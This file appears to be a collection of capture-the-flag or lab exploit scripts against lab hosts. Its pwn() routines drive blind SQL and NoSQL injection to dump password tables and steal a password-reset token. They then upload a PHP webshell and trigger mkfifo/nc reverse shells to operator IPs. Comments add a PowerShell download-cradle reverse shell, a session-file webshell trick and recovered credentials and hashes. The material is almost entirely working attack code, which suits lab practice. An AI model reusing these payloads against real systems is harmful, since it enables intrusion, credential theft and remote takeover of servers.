def pwn() -> None:
    """Dump the ``staff.password`` column from the target's MySQL database.

    Drives the ``ya`` SQL-injection helper (imported elsewhere in the file)
    over the request template ``req-view.txt``; the injection point noted in
    the comments is ``view_tickets_controller.php``. ``boolPredicate``
    classifies each response as true/false, so ``ya.boolExfiltrateList``
    is presumably a boolean-based blind extraction.

    The commented-out queries below record the enumeration that was done
    before settling on ``staff``. The result is bound to ``r`` but is
    neither printed nor returned.
    """
    # NOTE(review): recovered credentials and password hashes are kept in the
    # comments of this function; the file itself is sensitive material.
    # curl 'http://10.10.10.121:3000/GRAPHQL?query=query%7buser%7b%20username%20password%7d%7d'
    # [email protected]:godhelpmeplz
    # sqli in view_tickets_controller.php
    t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-view.txt')
    # qry = 'select @@version' # 5.7.24-0ubuntu0.16.04.1
    # r = ya.boolExfiltrate(t, qry, 'mysql')
    # users, settings
    # qry = ya.templates['mysql']['select']['tables']
    # ['USER', 'CURRENT_CONNECTIONS', 'TOTAL_CONNECTIONS', 'id', 'salutation', 'fullname', 'email', 'password', 'timezone', 'status']
    # qry = ya.templates['mysql']['select']['columns'].format(table='users')
    # qry = 'select email from users'
    # qry = 'select password from users'
    # [email protected]:c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
    # [email protected]:ec09fa0d0ba74336ea7fe392869adb198242f15a
    # qry = ya.templates['mysql']['select']['columns'].format(table='staff')
    # ['id', 'username', 'password', 'fullname', 'email', 'login', 'last_login', 'department', 'timezone', 'signature', 'newticket_notification', 'avatar', 'admin', 'status']
    # qry = 'select username from staff'
    qry = 'select password from staff' # admin:d318f44739dced66793b1a603028133a76ae680e:Welcome1
    # `r` is never used after this call; the extraction result is discarded.
    r = ya.boolExfiltrateList(t, qry, 'mysql')
def pwn() -> None:
    """Verify the boolean-based MSSQL injection by reading ``@@version``.

    Only the last two statements are live: a ``ya.Transport`` built from
    ``req-verify.txt`` with ``pBoolPayload``/``boolPredicate``, followed by
    ``ya.boolExfiltrate`` of ``SELECT @@version`` against the ``'mssql'``
    template set. The result is neither printed nor returned.

    Everything above those two lines is the earlier workflow, kept as a
    record in comments: a transport using ``responseProcessor=pResponse``
    with direct ``t.send`` calls, a paged dump of ``_logins`` driven by the
    ``util.limit`` template, and a command-execution path via ``rce`` (not
    defined in this function).
    """
    # NOTE(review): the commented history below includes an operator-side
    # host address and listener port; treat this file as sensitive.
    # t = ya.Transport(payloadProcessor=pPayload, responseProcessor=pResponse, requestPath='request.txt')
    # res = t.send(ya.templates['mssql']['select']['version']) # Microsoft SQL Server 2014 - 12.0.2269.0 (X64)
    # res = t.send(ya.templates['mssql']['select']['isShellEnabled']) # 1
    # res = t.send(ya.templates['mssql']['select']['user']) # web
    # res = t.send(ya.templates['mssql']['select']['database']) # web
    # print(res)
    # idx = 0
    # while True:
    #     # qry = ya.templates['mssql']['select']['tables'] # _logins, TEST1, TMPYU
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='_logins') # _e, _l, _n, _p, _u, id
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TEST1') # ID, OUT
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TMPYU') # ID, OUT
    #     qry = 'SELECT _e FROM _logins' # [email protected]
    #     limit = ya.templates['mssql']['util']['limit'].format(count=1, offset=idx)
    #     res = t.send(f'{qry} {limit}')
    #     if res is None: break
    #     print(res)
    #     idx += 1
    # interactiveCli(rce)
    # REMEMBER: python -m http.server 80
    # p = subprocess.Popen('nc -lvp 443'.split(' '))
    # revshell = R"""c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.16/Invoke-PowerShellTcp.ps1'');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 443" """
    # rce(revshell)
    # p.communicate()
    # bool
    # Live path: boolean-based transport over the verification request template.
    t = ya.Transport(payloadProcessor=pBoolPayload, predicate=boolPredicate, requestPath='req-verify.txt')
    # Return value is discarded; this call only confirms the injection works.
    ya.boolExfiltrate(t, 'SELECT @@version', 'mssql')
def rce(cmd) -> None:
    """Run ``cmd`` on the target through the ``ya`` MSSQL shell helpers.

    Builds a fresh transport over ``req-view.txt``, switches its payload
    processor to ``pPayloadStacked`` for the ``ya.mssqlShell`` call, then
    restores ``pPayload`` before ``ya.mssqlExfilShell`` runs (presumably to
    read the command output back; the helper is defined elsewhere).

    Args:
        cmd: command string handed to ``ya.mssqlShell``.

    Returns nothing; any output handling happens inside the ``ya`` helpers.
    """
    # NOTE(review): ``boolPredicate`` is passed as ``responseProcessor`` here,
    # whereas the sibling scripts pass it as ``predicate`` — confirm intended.
    t = ya.Transport(payloadProcessor=pPayload, responseProcessor=boolPredicate, requestPath='req-view.txt')
    # Stacked-query payload shape for the command itself.
    t.payloadProcessor = pPayloadStacked
    ya.mssqlShell(t, cmd)
    # Back to the plain payload shape for the follow-up exfiltration.
    t.payloadProcessor = pPayload
    ya.mssqlExfilShell(t)
def pwn() -> None:
    """End-to-end chain against the lab host ``192.168.0.150``.

    Steps, in order (each depends on the previous one's server-side
    state, so statement order matters):

    1. request a password reset for the ``'******'`` user, which
       presumably creates the reset token read in step 2;
    2. read ``user.token`` (``id_level = 1``) via time-based blind SQLi
       (``timePredicate``, ``timeBasedDelay=1``) using the ``ya`` helper;
    3. change the password with that token, then log in with it;
    4. upload a PHP file through ``item/updateItem.php``;
    5. start a local ``nc`` listener and request the uploaded file with a
       ``cmd`` parameter, then block in ``p.communicate()`` until the
       listener exits.

    Each HTTP step checks for ``'Oops!'`` in the body and exits on failure.
    Returns nothing.
    """
    # NOTE(review): the ``'******'`` literals look like redacted values in this
    # copy — confirm before relying on the script. Operator host/port and the
    # chosen password are hard-coded; treat the file as sensitive.
    # Imports (``ya``, ``subprocess``) and ``pPayload``/``timePredicate`` are
    # defined elsewhere in the file.
    t = ya.Transport(payloadProcessor=pPayload, predicate=timePredicate, requestPath='req-view.txt', debug=True)
    # Reuse the transport's requests session so cookies persist across steps.
    s = t.client.session
    res = s.post('http://192.168.0.150/login/resetPassword.php', data={'username': '******'})
    # qry = 'select @@version' # 5.7.33-0ubuntu0.18.04.1
    qry = 'select token from user where id_level = 1' # unaccessable_until_you_change_me, mJAL3qtMatNCDJ0
    newPwd = 'mypassword'
    token = ya.boolExfiltrate(t, qry, 'mysql', timeBasedDelay=1)
    data = {'token': token, 'password': newPwd}
    res = s.post('http://192.168.0.150/login/doChangePassword.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error reseting password')
        # ``exit`` here is the site-module builtin; ``sys.exit`` is the
        # conventional form for scripts.
        exit(-1)
    print(f'[+] login = admin:{newPwd}')
    data = {'username': '******', 'password': newPwd}
    res = s.post('http://192.168.0.150/login/checkLogin.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error login')
        exit(-1)
    print('[+] logged in')
    # Multipart form: every field is sent via ``files=`` so the whole body is
    # multipart/form-data; only ``image`` carries an actual file tuple.
    file = {
        'id': '2',
        'id_user': '******',
        'name': 'foo',
        'description': 'bar',
        'price': '1',
        'image': ('x.phar', "<?php system($_GET['cmd']); ?>", 'application/x-php')
    }
    res = s.post('http://192.168.0.150/item/updateItem.php', files=file)
    if 'Oops!' in res.text:
        print('[-] error uploading webshell')
        exit(-1)
    print('[+] webshell uploaded')
    ip = '192.168.0.102'
    port = 5555
    revshell = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {port} >/tmp/f'
    # Listener is started before the triggering request; argv is a fixed
    # list, so no shell is involved on the operator side.
    p = subprocess.Popen(f'nc -lvp {port}'.split(' '))
    # ``res`` from this request is never inspected; no timeout is set, so the
    # call blocks for as long as the server keeps the response open.
    res = s.get('http://192.168.0.150/item/image/x.phar', params={'cmd': revshell})
    p.communicate()
def pwn() -> None:
    """Dump ``users.password`` from the target's SQLite database and print it.

    Uses the ``ya`` helper over the ``req.login`` request template with
    ``timePredicate`` and ``timeBasedDelay=2``, i.e. the time-based variant
    of the extraction (the boolean-based transport and call are kept
    commented out above/below the live lines). Prints the resulting list;
    returns nothing.
    """
    # NOTE(review): the recovered hash and its plaintext are kept in a comment
    # below; treat this file as sensitive.
    # t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login')
    t = ya.Transport(payloadProcessor=pPayload, predicate=timePredicate, requestPath='req.login')
    # qry = ya.templates['sqlite']['select']['version']
    # res = ya.boolExfiltrate(t, qry, 'sqlite')
    # qry = ya.templates['sqlite']['select']['tables'] # ['users', 'notes', 'bookings', 'sessions']
    # qry = ya.templates['sqlite']['select']['columns'].replace('{table}', 'users') # ['CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,active TINYINT(1))']
    # qry = "SELECT username FROM users"
    qry = "SELECT password FROM users" # RickA:fdc8cd4cff2c19e0d1022e78481ddf36 (nevergonnagiveyouup)
    # res = ya.boolExfiltrateList(t, qry, 'sqlite')
    res = ya.boolExfiltrateList(t, qry, 'sqlite', timeBasedDelay=2)
    print(res)
def pwn() -> None:
    """Dump ``tblMembers.password`` from the target's MySQL/MariaDB database.

    Boolean-based extraction through the ``ya`` helper over the ``req.login``
    request template, with ``boolPredicate`` classifying responses. The
    commented lines record the enumeration (version, user, database,
    tables, columns) that preceded the live query. Prints the resulting
    list; returns nothing.
    """
    # NOTE(review): a recovered credential is kept in a comment below; treat
    # this file as sensitive.
    t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login')
    # Template set selector; the comments show the backend reported MariaDB.
    dbms = 'mysql'
    # qry = ya.templates[dbms]['select']['version'] # 10.0.23-MariaDB
    # qry = ya.templates[dbms]['select']['user'] # root@localhost
    # qry = ya.templates[dbms]['select']['database'] # seattle
    # ya.boolExfiltrate(t, qry, dbms)
    # qry = ya.templates[dbms]['select']['tables'] # ['tblBlogs', 'tblMembers', 'tblProducts']
    # qry = ya.templates[dbms]['select']['columns'].replace('{table}', 'tblMembers') # ['id', 'username', 'password', 'session', 'name', 'blog', 'admin']
    qry = 'SELECT password from tblMembers' # [email protected]:Assasin1
    res = ya.boolExfiltrateList(t, qry, dbms)
    print(res)
def pwn(): t = ya.Transport( payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-login.txt' ) # qry = 'select @@version' # ya.boolExfiltrate(t, qry,'mysql') # q = ya.templates['mysql']['select']['tables'] # users # q = ya.templates['mysql']['select']['columns'].format(table='users') # ID, username, password, role # q = 'SELECT password FROM users' # admin, chris # 0e462096931906507119562988736854, d4ee02a22fc872e36d9e3751ba72ddc8:juggling # ya.boolExfiltrateList(t, q, 'mysql') # admin:240610708 # RUN FTP SERVER WITH shell.php # python3 -m pyftpdlib -p21 -w ftp = threading.Thread(target=ftpd) ftp.daemon = True ftp.start() s = t.client.session s.post('http://10.10.10.73/login.php', {'username':'******','password':'******'}) res = s.post('http://10.10.10.73/upload.php', {'url':'http://10.10.14.9/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.gif'}) hit = re.findall('/var/www/html/(.*?);', res.text)[0] l = subprocess.Popen('nc -lvp 5555', shell=True) params = {'cmd':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 5555 >/tmp/f'} try: s.get(f'http://10.10.10.73/{hit}/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php', params=params, timeout=0.0001) except requests.exceptions.ReadTimeout: pass l.communicate()
def pwn() -> None:
    """Enumerate usernames, then each user's password, via NoSQL injection.

    Both phases use ``ya.boolExfiltrateList`` with
    ``exfilType=ya.BoolExfiltrateType.NOSQL`` and a ``'{guess}'`` format
    partial as the query template. Usernames are searched over lowercase
    ASCII using ``req-user.txt``; for every user found, ``req-pass.txt``
    is read, ``{user}`` substituted, and a new ``ya.HttpClient`` parsed
    from it so the password search can run over all non-whitespace
    printable characters.

    Returns nothing. ``passwords`` is assigned but never printed or stored,
    so the second phase's result is lost unless the ``ya`` helper reports
    it itself. ``partial`` and ``string`` are imported elsewhere.
    """
    t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-user.txt')
    # ``pTmp(guess=...)`` yields just the guessed string — no SQL wrapping.
    pTmp = partial('{guess}'.format)
    users = ya.boolExfiltrateList(t, pTmp, 'nosql', searchChars=string.ascii_lowercase, exfilType=ya.BoolExfiltrateType.NOSQL)
    # users = ['admin', 'mango']
    for user in users:
        # Template file is re-read per user; no encoding is specified.
        with open('req-pass.txt', 'r') as f:
            userFilled = f.read().replace('{user}', user)
        # Replace the transport's client with one built from the filled template.
        t.client = ya.HttpClient.parse(userFilled, debug=True)
        # Loop-invariant; set difference, so character order is unspecified.
        searchChars = ''.join(
            list(set(string.printable) - set(string.whitespace)))
        # pTmp = partial('PREFIX{guess}'.format)
        passwords = ya.boolExfiltrateList(
            t, pTmp, 'nosql', searchChars=searchChars, exfilType=ya.BoolExfiltrateType.NOSQL)
def boolPredicate(res) -> bool:
    """Return True when the response body contains ``'very sorry'``.

    Used by ``ya.Transport`` to classify each injected request as a
    true/false outcome. ``res`` is expected to expose ``.text``
    (a ``requests`` response, going by the rest of the file).
    """
    if 'very sorry' in res.text:
        return True
    else:
        return False


def pPayload(p: str) -> str:
    """Wrap a ``SELECT ...`` query into the ``id`` parameter payload.

    Strips the first ``'SELECT '`` prefix from ``p`` and embeds the
    remainder in a UNION/CASE expression so the page renders ``"main"``
    when the condition evaluates to 1 and ``"contact"`` otherwise — the
    two states ``boolPredicate`` distinguishes.

    Args:
        p: query string, normally starting with ``'SELECT '``.

    Returns:
        the payload string (the original ``p`` is not modified; ``str``
        operations return new objects).
    """
    p = p.replace('SELECT ', '', 1)
    sqli = f'465\' union select case when ({p})=1 then "main" else "contact" end-- -'
    return sqli


# Module-level transport shared by ``rce`` below; built from the
# ``req-index.txt`` template over TLS. ``ya`` is imported elsewhere.
t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req-index.txt', useSsl=True)


def rce(cmd) -> None:
    """Execute ``cmd`` on ``www.nestedflanders.htb`` and print the response.

    Sets a ``webshell`` cookie containing PHP, requests ``index.php?id=25``
    so the server stores the session, derives the session file path from
    the returned ``PHPSESSID``, then issues a second request whose ``id``
    parameter is a nested UNION payload selecting that path and whose
    ``cmd`` parameter is the command. The response body is printed.

    Args:
        cmd: command value placed in the ``cmd`` query parameter.

    Uses the module-level ``t`` for its session; returns nothing.
    """
    # NOTE(review): the session-file path is derived from the server's
    # PHPSESSID cookie — a missing cookie raises KeyError here.
    t.client.session.cookies['webshell'] = '<?php system($_GET["cmd"]) ?>'
    res = t.client.session.get(
        'https://www.nestedflanders.htb/index.php?id=25')
    wsPath = f'/var/lib/php/sessions/sess_{res.cookies["PHPSESSID"]}'
    params = {
        'id': f'465\' union select "1\' union select \'{wsPath}\'-- -"-- -',
        'cmd': cmd
    }
    res = t.client.session.get('https://www.nestedflanders.htb/index.php', params=params)
    print(res.text)